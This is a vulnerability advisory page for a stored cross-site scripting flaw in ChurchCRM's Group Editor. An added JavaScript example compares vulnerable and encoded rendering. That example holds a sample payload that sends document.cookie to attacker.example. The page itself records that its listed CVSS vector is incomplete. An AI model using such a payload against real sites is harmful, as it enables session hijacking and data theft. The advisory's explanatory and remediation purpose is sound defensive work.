Stored Cross Site Scripting Vulnerability in ChurchCRM by ChurchCRM
CVE-2025-0981

CVSS v4 score: 8.4 (HIGH)

Key Information:

Vendor: ChurchCRM
Status: Vendor
CVE Published: 18 February 2025

What is CVE-2025-0981?

A vulnerability in ChurchCRM versions 5.13.0 and earlier allows an attacker to exploit a stored cross-site scripting (XSS) flaw in the Group Editor page. Script saved through the Group Editor is served unescaped to other users who later view the page, so the attacker can have a victim's browser send its session cookie to a server the attacker controls. With that cookie the attacker can hijack the session, impersonate the victim, and read whatever data that account can reach. Two points a practitioner should keep in mind: the cookie-theft variant only works when the session cookie is readable from JavaScript (no HttpOnly flag), and even with HttpOnly set the injected script can still issue requests as the victim, so the flag is a mitigation and not a fix. The remediation identified here is to apply the vendor's security patch for affected versions.
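The following is an added illustration of the mechanism, written for this page in JavaScript; it is not ChurchCRM's code, and the function names, the table markup, the attacker URL and the Set-Cookie header are assumptions for the example. It renders a stored group name into HTML both the vulnerable way and the output-encoded way, shows which output would execute the attacker's script in a viewer's browser, and checks whether a session cookie is readable by that script (the HttpOnly point).

```javascript
// Added example (not ChurchCRM code): stored XSS in an "edit" page turning
// into session theft, beside the output-encoding fix. All names below
// (storeGroup, renderGroupList*, etc.) are hypothetical.

// --- 1. Server side: stored group records rendered into an HTML table ----
const groups = [];

function storeGroup(name) {
  // Storage itself is not the bug: a database happily holds "<script>".
  groups.push({ id: groups.length + 1, name });
}

// Vulnerable renderer: user-controlled text is interpolated straight into
// HTML, so whatever was saved is parsed as markup by every viewer.
function renderGroupListVulnerable() {
  return groups
    .map((g) => `<tr><td>${g.id}</td><td>${g.name}</td></tr>`)
    .join("\n");
}

// Contextual output encoding for the HTML text / attribute-value context.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Fixed renderer: same template, but every untrusted value is encoded.
function renderGroupListFixed() {
  return groups
    .map((g) => `<tr><td>${g.id}</td><td>${escapeHtml(g.name)}</td></tr>`)
    .join("\n");
}

// --- 2. What a viewer's browser would execute -----------------------------
// Stand-in for the HTML parser: returns the bodies of every <script>
// element that would run when the rendered page is loaded.
function extractInlineScripts(html) {
  const found = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) found.push(m[1]);
  return found;
}

// --- 3. Can the injected script read the session cookie? ------------------
// Parses a Set-Cookie header and reports whether document.cookie would
// expose it. HttpOnly removes only the direct cookie-exfiltration path;
// the script can still send requests as the logged-in user.
function sessionCookieReadableByScript(setCookieHeader) {
  const attrs = setCookieHeader
    .split(";")
    .slice(1)
    .map((a) => a.trim().toLowerCase());
  return !attrs.includes("httponly");
}

// --- Constructed sample data (not taken from a real ChurchCRM instance) ---
const ATTACKER_PAYLOAD =
  '<script>new Image().src="https://attacker.example/c?"' +
  "+encodeURIComponent(document.cookie)</script>";

storeGroup("Choir");
storeGroup(ATTACKER_PAYLOAD); // saved via the "group name" field, hypothetically

// Usage: compare what each renderer hands to the victim's browser.
console.log("scripts in vulnerable page:", extractInlineScripts(renderGroupListVulnerable()).length); // 1
console.log("scripts in fixed page:", extractInlineScripts(renderGroupListFixed()).length); // 0
console.log("cookie readable by script:", sessionCookieReadableByScript("PHPSESSID=abc123; Path=/; Secure")); // true
console.log("with HttpOnly:", sessionCookieReadableByScript("PHPSESSID=abc123; Path=/; HttpOnly; Secure")); // false
```

The fix is in the renderer, not in storage or input filtering: encoding at the point where data meets the HTML context neutralises the payload regardless of how it got into the database, which is why input-side blocklists are not a substitute.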

Affected Version(s)

ChurchCRM (vendor ChurchCRM), version 5.13.0 and prior

References

CVSS v4

Score: 8.4
Severity: HIGH
Confidentiality: High
Integrity: Low
Availability: High
Attack Vector: Network
Attack Complexity: Low
Attack Requirements: None
Privileges Required: Undefined
User Interaction: Unknown

Note: "Undefined" and "Unknown" are not valid CVSS v4 values for Privileges Required and User Interaction; this page does not record those two metrics, so the full vector cannot be reconstructed from the listing above. A stored XSS reached through an editor page normally needs an account permitted to save the group and a victim who later loads it, which is worth confirming against the published vector before reusing the 8.4 score.

Timeline

  • Vulnerability reserved

  • Vulnerability published: 18 February 2025

Credit

Michael McInerney